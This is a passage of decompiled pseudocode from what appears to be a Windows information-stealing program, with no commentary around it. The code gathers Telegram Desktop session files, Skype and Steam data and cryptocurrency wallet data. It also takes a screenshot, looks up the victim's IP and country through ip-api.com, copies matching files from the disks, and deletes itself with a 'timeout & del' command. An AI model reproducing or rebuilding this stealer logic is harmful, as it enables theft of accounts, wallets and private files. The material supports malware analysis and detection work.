                                                                                                                                                                                          						E00403850();
                                                                                                                                                                                          						_t651 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                          						_t1045 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                          						E00403798(_t651,  *_t1045);
                                                                                                                                                                                          						_push(_v24);
                                                                                                                                                                                          						_t654 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                          						_push( *_t654);
                                                                                                                                                                                          						E004063A4( &_v592, _t954, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v592);
                                                                                                                                                                                          						_t657 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                          						_push( *_t657);
                                                                                                                                                                                          						E0040653C( &_v596, _t954, _t968, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v596);
                                                                                                                                                                                          						_t660 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                          						_push( *_t660);
                                                                                                                                                                                          						E0040DEE4( &_v600, _t954, _t1168);
                                                                                                                                                                                          						_push(_v600);
                                                                                                                                                                                          						_t663 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                          						_push( *_t663);
                                                                                                                                                                                          						E00403850();
                                                                                                                                                                                          						_t1169 = _v81 - 1;
                                                                                                                                                                                          						if(_v81 == 1) {
                                                                                                                                                                                          							_push(_v76);
                                                                                                                                                                                          							_push(0x41a3b8);
                                                                                                                                                                                          							_push(_v80);
                                                                                                                                                                                          							E00403850();
                                                                                                                                                                                          							E00403798( &_v20, _v604);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E004176D8( &_v20, _t954, 0x80000, _v88, _t1132, _t1137);
                                                                                                                                                                                          						_t970 = 0;
                                                                                                                                                                                          						_t668 =  *0x41c8c0; // 0x0
                                                                                                                                                                                          						E00418688(_t668, _t954, _v20, _t1132, _t1137,  &_v608);
                                                                                                                                                                                          						_t671 =  *0x41b60c; // 0x41c6a0
                                                                                                                                                                                          						 *((intOrPtr*)( *_t671))(_v108);
                                                                                                                                                                                          						E004050C8(0x41a3f4, _t954, _t1132, _t1137, _t1169);
                                                                                                                                                                                          						_t677 = E00403790(_v72);
                                                                                                                                                                                          						_t1170 = _t677 - 3;
                                                                                                                                                                                          						if(_t677 <= 3) {
                                                                                                                                                                                          							L62:
                                                                                                                                                                                          							E004087DC(_t954, _t1137);
                                                                                                                                                                                          							E00407D24( &_v616, _t1181);
                                                                                                                                                                                          							E004038DC(_v616, 0x41a424);
                                                                                                                                                                                          							if(_t1181 != 0) {
                                                                                                                                                                                          								L65:
                                                                                                                                                                                          								E004038DC(_v8, 0x41a430);
                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                          									__eflags = _v82 - 1;
                                                                                                                                                                                          									if(_v82 == 1) {
                                                                                                                                                                                          										E004028E0( &_v304, 0x3c);
                                                                                                                                                                                          										_v304 = 0x3c;
                                                                                                                                                                                          										_v300 = 0x1c0;
                                                                                                                                                                                          										_v296 = 0;
                                                                                                                                                                                          										_v292 = 0;
                                                                                                                                                                                          										E004062D8(L"%comspec%",  &_v620, __eflags);
                                                                                                                                                                                          										_v288 = E00403D3C(_v620);
                                                                                                                                                                                          										E004062D8(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v628, __eflags);
                                                                                                                                                                                          										E00402754(0,  &_v640);
                                                                                                                                                                                          										E00403D2C( &_v636, _v640);
                                                                                                                                                                                          										E0040770C(_v636, _t954, 0,  &_v632, _t1137, __eflags);
                                                                                                                                                                                          										E00403E1C();
                                                                                                                                                                                          										_v284 = E00403D3C(_v624);
                                                                                                                                                                                          										E00402754(0,  &_v652);
                                                                                                                                                                                          										E00403D2C( &_v648, _v652);
                                                                                                                                                                                          										E00407798(_v648, _t954, 0,  &_v644, _t1137, __eflags);
                                                                                                                                                                                          										_v280 = E00403D3C(_v644);
                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                          										_v276 = 0;
                                                                                                                                                                                          										_t714 =  *0x41b564; // 0x41c768
                                                                                                                                                                                          										 *((intOrPtr*)( *_t714))( &_v304, E0041A4AC, _v632, _v628);
                                                                                                                                                                                          										ExitProcess(0);
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          								goto L68;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							E004038DC(_v8, 0x41a430);
                                                                                                                                                                                          							if(_t1181 != 0) {
                                                                                                                                                                                          								goto L65;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							E00407DD4(_t954, _t970, _t1132, _t1137, _t1181);
                                                                                                                                                                                          							goto L68;
                                                                                                                                                                                          						} else {
                                                                                                                                                                                          							_t970 =  &_v52;
                                                                                                                                                                                          							E0040795C(0x41a1ac,  &_v52, _v72, _t1170);
                                                                                                                                                                                          							_t1132 = E004045EC(_v52) - 1;
                                                                                                                                                                                          							if(_t1132 < 0) {
                                                                                                                                                                                          								goto L62;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t1134 = _t1132 + 1;
                                                                                                                                                                                          							_t955 = 0;
                                                                                                                                                                                          							do {
                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                          								E004047A8();
                                                                                                                                                                                          								_t1141 = _t1141 + 4;
                                                                                                                                                                                          								_t970 =  &_v56;
                                                                                                                                                                                          								E0040795C(0x41a2dc,  &_v56,  *((intOrPtr*)(_v52 + _t955 * 4)), 0);
                                                                                                                                                                                          								_t1173 = E004045EC(_v56) - 4;
                                                                                                                                                                                          								if(_t1173 != 0) {
                                                                                                                                                                                          									goto L61;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								E004038DC( *_v56, 0x41a400);
                                                                                                                                                                                          								if(_t1173 != 0) {
                                                                                                                                                                                          									goto L61;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t970 =  &_v60;
                                                                                                                                                                                          								E0040795C(0x41a40c,  &_v60,  *((intOrPtr*)(_v56 + 0xc)), _t1173);
                                                                                                                                                                                          								_v83 = 0;
                                                                                                                                                                                          								_t1137 = E004045EC(_v60) - 1;
                                                                                                                                                                                          								if(_t1137 < 0) {
                                                                                                                                                                                          									L59:
                                                                                                                                                                                          									_t1179 = _v83 - 1;
                                                                                                                                                                                          									if(_v83 == 1) {
                                                                                                                                                                                          										E004038DC( *((intOrPtr*)(_v56 + 8)), 0x41a418);
                                                                                                                                                                                          										E00418CF4( *((intOrPtr*)(_v56 + 4)), _t955, 0x41a400 | _t1179 == 0x00000000, _t1134, _t1137);
                                                                                                                                                                                          									}
                                                                                                                                                                                          									goto L61;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t1137 = _t1137 + 1;
                                                                                                                                                                                          								_v68 = 0;
                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                          									E00406318( *((intOrPtr*)(_v60 + _v68 * 4)), _t955,  &_v612, _t1134, _t1137);
                                                                                                                                                                                          									_t1072 =  *0x41b568; // 0x41c66c
                                                                                                                                                                                          									_v83 = E00403A78(_v612,  *_t1072) != 0;
                                                                                                                                                                                          									if(_v83 == 1) {
                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_v68 = _v68 + 1;
                                                                                                                                                                                          									_t1137 = _t1137 - 1;
                                                                                                                                                                                          									if(_t1137 != 0) {
                                                                                                                                                                                          										continue;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									goto L59;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								goto L59;
                                                                                                                                                                                          								L61:
                                                                                                                                                                                          								_t955 = _t955 + 1;
                                                                                                                                                                                          								_t1134 = _t1134 - 1;
                                                                                                                                                                                          								_t1181 = _t1134;
                                                                                                                                                                                          							} while (_t1181 != 0);
                                                                                                                                                                                          							goto L62;
                                                                                                                                                                                          						}
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_t1135 = _t1132 + 1;
                                                                                                                                                                                          						_t956 = 0;
                                                                                                                                                                                          						do {
                                                                                                                                                                                          							if(E00403790( *((intOrPtr*)(_v44 + _t956 * 4))) < 5) {
                                                                                                                                                                                          								goto L47;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							if(_t956 == 0) {
                                                                                                                                                                                          								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 9)) == 0x2b) {
                                                                                                                                                                                          									E00414098();
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t907 =  *((intOrPtr*)(_v44 + _t956 * 4));
                                                                                                                                                                                          								_t1154 =  *((char*)(_t907 + 3)) - 0x2b;
                                                                                                                                                                                          								if( *((char*)(_t907 + 3)) == 0x2b) {
                                                                                                                                                                                          									E00415EA8(L"Coins", _t956, _t968, _t1017, _t1135, _t1137, _t1154);
                                                                                                                                                                                          									_t932 =  *0x41b5c4; // 0x41b0b0
                                                                                                                                                                                          									_t1155 =  *_t932;
                                                                                                                                                                                          									if( *_t932 > 0) {
                                                                                                                                                                                          										E004050C8(0x41a200, _t956, _t1135, _t1137, _t1155);
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 4)) == 0x2b) {
                                                                                                                                                                                          									E00414CB8(L"Skype", _t956, _t1135, _t1137);
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 5)) == 0x2b) {
                                                                                                                                                                                          									_t968 = L"Telegram";
                                                                                                                                                                                          									_t1017 = L"D877F783D5*,map*";
                                                                                                                                                                                          									E00414408(L"%appdata%\\Telegram Desktop\\tdata\\", _t956, L"Telegram", L"D877F783D5*,map*", _t1135, _t1137, 0, 0, 1, 0x3e8, 0);
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 6)) == 0x2b) {
                                                                                                                                                                                          									E00414F40(L"Steam", _t956, _t1135, _t1137);
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 7)) == 0x2b) {
                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                          									_push(0x32);
                                                                                                                                                                                          									_push(L"image/jpeg");
                                                                                                                                                                                          									_push( &_v64);
                                                                                                                                                                                          									_push(GetSystemMetrics(1));
                                                                                                                                                                                          									_t920 = GetSystemMetrics(0);
                                                                                                                                                                                          									_t968 = 0;
                                                                                                                                                                                          									_pop(_t1094);
                                                                                                                                                                                          									E004178B4(_t920, _t956, 0, _t1094, _t1135, _t1137);
                                                                                                                                                                                          									_t1017 = "scr.jpg";
                                                                                                                                                                                          									E0040DCE8(_v64, _t956, "scr.jpg", _t1135, _t1137);
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 8)) == 0x2b) {
                                                                                                                                                                                          									_v82 = 1;
                                                                                                                                                                                          								}
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t756 = _v44;
                                                                                                                                                                                          							_t1162 =  *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) - 0x46;
                                                                                                                                                                                          							if( *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) != 0x46) {
                                                                                                                                                                                          								L41:
                                                                                                                                                                                          								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) == 0x4c) {
                                                                                                                                                                                          									_push(_v72);
                                                                                                                                                                                          									_push( *((intOrPtr*)(_v44 + _t956 * 4)));
                                                                                                                                                                                          									_push(0x41a1ac);
                                                                                                                                                                                          									_t1017 = 3;
                                                                                                                                                                                          									E00403850();
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t1167 =  *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) - 0x49;
                                                                                                                                                                                          								if(_t1167 == 0) {
                                                                                                                                                                                          									_t968 =  &_v48;
                                                                                                                                                                                          									E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1167);
                                                                                                                                                                                          									E004038DC( *((intOrPtr*)(_v48 + 4)), 0x41a348);
                                                                                                                                                                                          									if(_t1167 != 0) {
                                                                                                                                                                                          										_t1017 = "ip.txt";
                                                                                                                                                                                          										E0040DCE8( *((intOrPtr*)(_v48 + 4)), _t956, "ip.txt", _t1135, _t1137);
                                                                                                                                                                                          									} else {
                                                                                                                                                                                          										_v81 = 1;
                                                                                                                                                                                          										E00418688("http://ip-api.com/json", _t956, 0, _t1135, _t1137,  &_v28);
                                                                                                                                                                                          										E00407428("\"query\":\"", _t956, 0x41a380, _v28, _t1137,  &_v76);
                                                                                                                                                                                          										_t968 = 0x41a380;
                                                                                                                                                                                          										E00407428("\"countryCode\":\"", _t956, 0x41a380, _v28, _t1137,  &_v80);
                                                                                                                                                                                          										_push(_v76);
                                                                                                                                                                                          										_push(0x41a3b8);
                                                                                                                                                                                          										_push(_v80);
                                                                                                                                                                                          										E00403850();
                                                                                                                                                                                          										_t1017 = "ip.txt";
                                                                                                                                                                                          										E0040DCE8(_v456, _t956, "ip.txt", _t1135, _t1137);
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          							} else {
                                                                                                                                                                                          								E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1162);
                                                                                                                                                                                          								E0040357C( &_v92,  *((intOrPtr*)(_v48 + 8)));
                                                                                                                                                                                          								if(E00403A78(0x41a2e8, _v92) != 1) {
                                                                                                                                                                                          									E00403D2C( &_v428,  *((intOrPtr*)(_v48 + 0x1c)));
                                                                                                                                                                                          									_push(_v428);
                                                                                                                                                                                          									E00403D2C( &_v432,  *((intOrPtr*)(_v48 + 0x10)));
                                                                                                                                                                                          									_push(E00407048(_v432, _t956,  &_v48, __eflags));
                                                                                                                                                                                          									_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
                                                                                                                                                                                          									_t806 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
                                                                                                                                                                                          									_t193 = __eflags == 0;
                                                                                                                                                                                          									__eflags = _t193;
                                                                                                                                                                                          									_push(_t806 & 0xffffff00 | _t193);
                                                                                                                                                                                          									_push(1);
                                                                                                                                                                                          									_push("Files\\");
                                                                                                                                                                                          									_push( *((intOrPtr*)(_v48 + 4)));
                                                                                                                                                                                          									_push(0x41a310);
                                                                                                                                                                                          									E00403850();
                                                                                                                                                                                          									E00403D2C( &_v436, _v440);
                                                                                                                                                                                          									_push(_v436);
                                                                                                                                                                                          									E00403D2C( &_v444,  *((intOrPtr*)(_v48 + 0xc)));
                                                                                                                                                                                          									_push(_v444);
                                                                                                                                                                                          									E004037DC( &_v452, 0x41a310,  *((intOrPtr*)(_v48 + 8)));
                                                                                                                                                                                          									E00403D2C( &_v448, _v452);
                                                                                                                                                                                          									_pop(_t1017);
                                                                                                                                                                                          									_pop(_t968);
                                                                                                                                                                                          									E00414408(_v448, _t956, _t968, _t1017, _t1135, _t1137);
                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t968 = 0x41a2f8;
                                                                                                                                                                                          								_t1017 = _v92;
                                                                                                                                                                                          								E00407428(0x41a2e8, _t956, 0x41a2f8, _v92, _t1137,  &_v104);
                                                                                                                                                                                          								_push( &_v241);
                                                                                                                                                                                          								_push(0x81);
                                                                                                                                                                                          								_t827 =  *0x41b59c; // 0x41c6fc
                                                                                                                                                                                          								if( *((intOrPtr*)( *_t827))() == 0) {
                                                                                                                                                                                          									goto L68;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t1137 =  &_v241;
                                                                                                                                                                                          								while( *_t1137 != 0) {
                                                                                                                                                                                          									_t830 =  *0x41b54c; // 0x41c700
                                                                                                                                                                                          									E00406FDC( *((intOrPtr*)( *_t830))(_t1137), _t956,  &_v360, _t1137, __eflags);
                                                                                                                                                                                          									E0040377C( &_v356, _v360);
                                                                                                                                                                                          									_t1017 = _v104;
                                                                                                                                                                                          									_t837 = E00403A78(_v356, _v104);
                                                                                                                                                                                          									__eflags = _t837;
                                                                                                                                                                                          									if(_t837 != 0) {
                                                                                                                                                                                          										_push( &_v364);
                                                                                                                                                                                          										E00403C98( &_v368, _t1137);
                                                                                                                                                                                          										_push(_v368);
                                                                                                                                                                                          										_push("%DSK_");
                                                                                                                                                                                          										_push(_v104);
                                                                                                                                                                                          										E00403850();
                                                                                                                                                                                          										E00403D2C( &_v372, _v376);
                                                                                                                                                                                          										_push(_v372);
                                                                                                                                                                                          										E00403D2C( &_v380, _v92);
                                                                                                                                                                                          										_pop(_t1102);
                                                                                                                                                                                          										_t975 = 0x41a304;
                                                                                                                                                                                          										E004070BC(_v380, _t956, _t975, _t1102);
                                                                                                                                                                                          										E0040377C( &_v100, _v364);
                                                                                                                                                                                          										E004034E4( &_v96);
                                                                                                                                                                                          										_push( *((intOrPtr*)(_v48 + 4)));
                                                                                                                                                                                          										_push(0x41a310);
                                                                                                                                                                                          										_push(_v100);
                                                                                                                                                                                          										E00403850();
                                                                                                                                                                                          										E00403D2C( &_v388, _v96);
                                                                                                                                                                                          										E004070BC(_v388, _t956, 0, 0x41a318,  &_v384);
                                                                                                                                                                                          										E00403D58( &_v384, 0, 0x41a320, __eflags);
                                                                                                                                                                                          										E0040377C( &_v96, _v384);
                                                                                                                                                                                          										E00403D2C( &_v396, _v96);
                                                                                                                                                                                          										E0040781C(_v396, _t956,  &_v392, __eflags);
                                                                                                                                                                                          										E0040377C( &_v96, _v392);
                                                                                                                                                                                          										E00403D2C( &_v400,  *((intOrPtr*)(_v48 + 0x1c)));
                                                                                                                                                                                          										_push(_v400);
                                                                                                                                                                                          										E00403D2C( &_v404,  *((intOrPtr*)(_v48 + 0x10)));
                                                                                                                                                                                          										_push(E00407048(_v404, _t956, 0, __eflags));
                                                                                                                                                                                          										_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
                                                                                                                                                                                          										_t884 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
                                                                                                                                                                                          										_t163 = __eflags == 0;
                                                                                                                                                                                          										__eflags = _t163;
                                                                                                                                                                                          										_push(_t884 & 0xffffff00 | _t163);
                                                                                                                                                                                          										_push(1);
                                                                                                                                                                                          										E004037DC( &_v412, _v96, "Files\\");
                                                                                                                                                                                          										E00403D2C( &_v408, _v412);
                                                                                                                                                                                          										_push(_v408);
                                                                                                                                                                                          										E00403D2C( &_v416,  *((intOrPtr*)(_v48 + 0xc)));
                                                                                                                                                                                          										_push(_v416);
                                                                                                                                                                                          										E004037DC( &_v424, 0x41a310, _v100);
                                                                                                                                                                                          										E00403D2C( &_v420, _v424);
                                                                                                                                                                                          										_pop(_t1017);
                                                                                                                                                                                          										_pop(_t968);
                                                                                                                                                                                          										E00414408(_v420, _t956, _t968, _t1017, _t1135, _t1137);
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t1137 = _t1137 + 4;
                                                                                                                                                                                          									__eflags = _t1137;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							L47:
                                                                                                                                                                                          							_t956 = _t956 + 1;
                                                                                                                                                                                          							_t1135 = _t1135 - 1;
                                                                                                                                                                                          							_t1168 = _t1135;
                                                                                                                                                                                          						} while (_t1135 != 0);
                                                                                                                                                                                          						goto L48;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}

                                                                                                                                                                                          0x0041a005
                                                                                                                                                                                          0x0041a010
                                                                                                                                                                                          0x0041a020
                                                                                                                                                                                          0x0041a02b
                                                                                                                                                                                          0x0041a03b
                                                                                                                                                                                          0x0041a046
                                                                                                                                                                                          0x0041a056
                                                                                                                                                                                          0x0041a066
                                                                                                                                                                                          0x0041a071
                                                                                                                                                                                          0x0041a081
                                                                                                                                                                                          0x0041a08c
                                                                                                                                                                                          0x0041a09c
                                                                                                                                                                                          0x0041a0a7
                                                                                                                                                                                          0x0041a0b7
                                                                                                                                                                                          0x0041a0c2
                                                                                                                                                                                          0x0041a0d2
                                                                                                                                                                                          0x0041a0e2
                                                                                                                                                                                          0x0041a0ea
                                                                                                                                                                                          0x0041a0f5
                                                                                                                                                                                          0x0041a102
                                                                                                                                                                                          0x0041a10a
                                                                                                                                                                                          0x0041a112
                                                                                                                                                                                          0x0041a11f
                                                                                                                                                                                          0x0041a12c
                                                                                                                                                                                          0x0041a139
                                                                                                                                                                                          0x004191ae
                                                                                                                                                                                          0x004191b1
                                                                                                                                                                                          0x004191b6
                                                                                                                                                                                          0x004191bb
                                                                                                                                                                                          0x004191c0
                                                                                                                                                                                          0x004191cd
                                                                                                                                                                                          0x004191db
                                                                                                                                                                                          0x004191e0
                                                                                                                                                                                          0x004191e1
                                                                                                                                                                                          0x004191e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004191e2
                                                                                                                                                                                          0x004191e7
                                                                                                                                                                                          0x004191f2
                                                                                                                                                                                          0x00419203
                                                                                                                                                                                          0x00419214
                                                                                                                                                                                          0x00419224
                                                                                                                                                                                          0x00419232
                                                                                                                                                                                          0x00419237
                                                                                                                                                                                          0x00419247
                                                                                                                                                                                          0x00419254
                                                                                                                                                                                          0x00419259
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419267
                                                                                                                                                                                          0x0041926c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419286
                                                                                                                                                                                          0x00419294
                                                                                                                                                                                          0x004192ad
                                                                                                                                                                                          0x004192bb
                                                                                                                                                                                          0x004192cb
                                                                                                                                                                                          0x004192d7
                                                                                                                                                                                          0x004192e4
                                                                                                                                                                                          0x004192ef
                                                                                                                                                                                          0x004192f5
                                                                                                                                                                                          0x00419300
                                                                                                                                                                                          0x00419308
                                                                                                                                                                                          0x0041930f
                                                                                                                                                                                          0x0041931e
                                                                                                                                                                                          0x00419321
                                                                                                                                                                                          0x00419909
                                                                                                                                                                                          0x00419909
                                                                                                                                                                                          0x0041990c
                                                                                                                                                                                          0x00419917
                                                                                                                                                                                          0x0041991c
                                                                                                                                                                                          0x0041992d
                                                                                                                                                                                          0x0041993d
                                                                                                                                                                                          0x00419948
                                                                                                                                                                                          0x00419959
                                                                                                                                                                                          0x0041995e
                                                                                                                                                                                          0x00419964
                                                                                                                                                                                          0x0041996f
                                                                                                                                                                                          0x00419980
                                                                                                                                                                                          0x00419985
                                                                                                                                                                                          0x0041998b
                                                                                                                                                                                          0x00419996
                                                                                                                                                                                          0x004199a7
                                                                                                                                                                                          0x004199b8
                                                                                                                                                                                          0x004199bd
                                                                                                                                                                                          0x004199c3
                                                                                                                                                                                          0x004199ce
                                                                                                                                                                                          0x004199df
                                                                                                                                                                                          0x004199f0
                                                                                                                                                                                          0x004199f5
                                                                                                                                                                                          0x004199fb
                                                                                                                                                                                          0x00419a06
                                                                                                                                                                                          0x00419a17
                                                                                                                                                                                          0x00419a28
                                                                                                                                                                                          0x00419a2d
                                                                                                                                                                                          0x00419a33
                                                                                                                                                                                          0x00419a3e
                                                                                                                                                                                          0x00419a4f
                                                                                                                                                                                          0x00419a60
                                                                                                                                                                                          0x00419a65
                                                                                                                                                                                          0x00419a6b
                                                                                                                                                                                          0x00419a76
                                                                                                                                                                                          0x00419a7d
                                                                                                                                                                                          0x00419a8e
                                                                                                                                                                                          0x00419a9f
                                                                                                                                                                                          0x00419aa4
                                                                                                                                                                                          0x00419aaa
                                                                                                                                                                                          0x00419ab5
                                                                                                                                                                                          0x00419abc
                                                                                                                                                                                          0x00419acd
                                                                                                                                                                                          0x00419ade
                                                                                                                                                                                          0x00419ae3
                                                                                                                                                                                          0x00419ae9
                                                                                                                                                                                          0x00419af4
                                                                                                                                                                                          0x00419afb
                                                                                                                                                                                          0x00419b0c
                                                                                                                                                                                          0x00419b1d
                                                                                                                                                                                          0x00419b22
                                                                                                                                                                                          0x00419b28
                                                                                                                                                                                          0x00419b33
                                                                                                                                                                                          0x00419b3a
                                                                                                                                                                                          0x00419b4b
                                                                                                                                                                                          0x00419b5c
                                                                                                                                                                                          0x00419b61
                                                                                                                                                                                          0x00419b67
                                                                                                                                                                                          0x00419b75
                                                                                                                                                                                          0x00419b7a
                                                                                                                                                                                          0x00419b80
                                                                                                                                                                                          0x00419b8b
                                                                                                                                                                                          0x00419b9c
                                                                                                                                                                                          0x00419ba1
                                                                                                                                                                                          0x00419baf
                                                                                                                                                                                          0x00419bb4
                                                                                                                                                                                          0x00419bb9
                                                                                                                                                                                          0x00419bc1
                                                                                                                                                                                          0x00419bcb
                                                                                                                                                                                          0x00419bce
                                                                                                                                                                                          0x00419bd3
                                                                                                                                                                                          0x00419825
                                                                                                                                                                                          0x0041982e
                                                                                                                                                                                          0x00419830
                                                                                                                                                                                          0x00419836
                                                                                                                                                                                          0x00419839
                                                                                                                                                                                          0x00419841
                                                                                                                                                                                          0x00419846
                                                                                                                                                                                          0x00419846
                                                                                                                                                                                          0x00419851
                                                                                                                                                                                          0x00419854
                                                                                                                                                                                          0x0041985a
                                                                                                                                                                                          0x00419868
                                                                                                                                                                                          0x00419878
                                                                                                                                                                                          0x0041987d
                                                                                                                                                                                          0x004198f7
                                                                                                                                                                                          0x004198fc
                                                                                                                                                                                          0x0041987f
                                                                                                                                                                                          0x0041987f
                                                                                                                                                                                          0x00419893
                                                                                                                                                                                          0x004198a9
                                                                                                                                                                                          0x004198b2
                                                                                                                                                                                          0x004198bf
                                                                                                                                                                                          0x004198c4
                                                                                                                                                                                          0x004198c7
                                                                                                                                                                                          0x004198cc
                                                                                                                                                                                          0x004198da
                                                                                                                                                                                          0x004198e5
                                                                                                                                                                                          0x004198ea
                                                                                                                                                                                          0x004198ea
                                                                                                                                                                                          0x0041987d
                                                                                                                                                                                          0x004194a1
                                                                                                                                                                                          0x004194af
                                                                                                                                                                                          0x004194bd
                                                                                                                                                                                          0x004194d0
                                                                                                                                                                                          0x0041974e
                                                                                                                                                                                          0x00419759
                                                                                                                                                                                          0x00419766
                                                                                                                                                                                          0x00419776
                                                                                                                                                                                          0x0041978a
                                                                                                                                                                                          0x00419796
                                                                                                                                                                                          0x0041979b
                                                                                                                                                                                          0x0041979b
                                                                                                                                                                                          0x0041979e
                                                                                                                                                                                          0x0041979f
                                                                                                                                                                                          0x004197a1
                                                                                                                                                                                          0x004197a9
                                                                                                                                                                                          0x004197ac
                                                                                                                                                                                          0x004197bc
                                                                                                                                                                                          0x004197cd
                                                                                                                                                                                          0x004197d8
                                                                                                                                                                                          0x004197e5
                                                                                                                                                                                          0x004197f0
                                                                                                                                                                                          0x00419802
                                                                                                                                                                                          0x00419813
                                                                                                                                                                                          0x0041981e
                                                                                                                                                                                          0x0041981f
                                                                                                                                                                                          0x00419820
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419820
                                                                                                                                                                                          0x004194da
                                                                                                                                                                                          0x004194df
                                                                                                                                                                                          0x004194e7
                                                                                                                                                                                          0x004194f2
                                                                                                                                                                                          0x004194f3
                                                                                                                                                                                          0x004194f8
                                                                                                                                                                                          0x00419503
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419509
                                                                                                                                                                                          0x00419734
                                                                                                                                                                                          0x00419515
                                                                                                                                                                                          0x00419524
                                                                                                                                                                                          0x00419535
                                                                                                                                                                                          0x00419540
                                                                                                                                                                                          0x00419543
                                                                                                                                                                                          0x00419548
                                                                                                                                                                                          0x0041954a
                                                                                                                                                                                          0x00419556
                                                                                                                                                                                          0x0041955f
                                                                                                                                                                                          0x0041956a
                                                                                                                                                                                          0x0041956b
                                                                                                                                                                                          0x00419570
                                                                                                                                                                                          0x00419583
                                                                                                                                                                                          0x00419594
                                                                                                                                                                                          0x0041959f
                                                                                                                                                                                          0x004195a9
                                                                                                                                                                                          0x004195b4
                                                                                                                                                                                          0x004195b5
                                                                                                                                                                                          0x004195b6
                                                                                                                                                                                          0x004195c4
                                                                                                                                                                                          0x004195cc
                                                                                                                                                                                          0x004195d4
                                                                                                                                                                                          0x004195d7
                                                                                                                                                                                          0x004195dc
                                                                                                                                                                                          0x004195e7
                                                                                                                                                                                          0x004195fc
                                                                                                                                                                                          0x0041960e
                                                                                                                                                                                          0x0041961e
                                                                                                                                                                                          0x0041962c
                                                                                                                                                                                          0x0041963a
                                                                                                                                                                                          0x0041964b
                                                                                                                                                                                          0x00419659
                                                                                                                                                                                          0x0041966a
                                                                                                                                                                                          0x00419675
                                                                                                                                                                                          0x00419682
                                                                                                                                                                                          0x00419692
                                                                                                                                                                                          0x004196a6
                                                                                                                                                                                          0x004196b2
                                                                                                                                                                                          0x004196b7
                                                                                                                                                                                          0x004196b7
                                                                                                                                                                                          0x004196ba
                                                                                                                                                                                          0x004196bb
                                                                                                                                                                                          0x004196cb
                                                                                                                                                                                          0x004196dc
                                                                                                                                                                                          0x004196e7
                                                                                                                                                                                          0x004196f4
                                                                                                                                                                                          0x004196ff
                                                                                                                                                                                          0x0041970e
                                                                                                                                                                                          0x0041971f
                                                                                                                                                                                          0x0041972a
                                                                                                                                                                                          0x0041972b
                                                                                                                                                                                          0x0041972c
                                                                                                                                                                                          0x0041972c
                                                                                                                                                                                          0x00419731
                                                                                                                                                                                          0x00419731
                                                                                                                                                                                          0x00419731
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041973d
                                                                                                                                                                                          0x00419901
                                                                                                                                                                                          0x00419901
                                                                                                                                                                                          0x00419902
                                                                                                                                                                                          0x00419902
